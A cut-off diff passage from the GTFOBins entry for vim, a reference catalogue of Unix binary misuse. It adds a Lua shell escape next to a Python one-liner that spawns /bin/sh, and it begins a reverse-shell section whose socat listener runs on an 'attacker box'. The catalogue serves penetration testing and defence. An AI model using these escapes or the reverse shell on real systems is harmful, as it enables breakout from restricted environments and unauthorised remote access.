GTFOBins/GTFOBins.github.io/_gtfobins/vim.md

         :shell
     - description: This requires that `vim` is compiled with Python support.
 Prepend `:py3` for Python 3.
       code: vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
+    - description: This requires that `vim` is compiled with Lua support.
+      code: vim -c ':lua os.execute("reset; exec sh")'
   reverse-shell:
     - description: This requires that `vim` is compiled with Python support.
 Prepend `:py3` for Python 3.
 Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
       code: |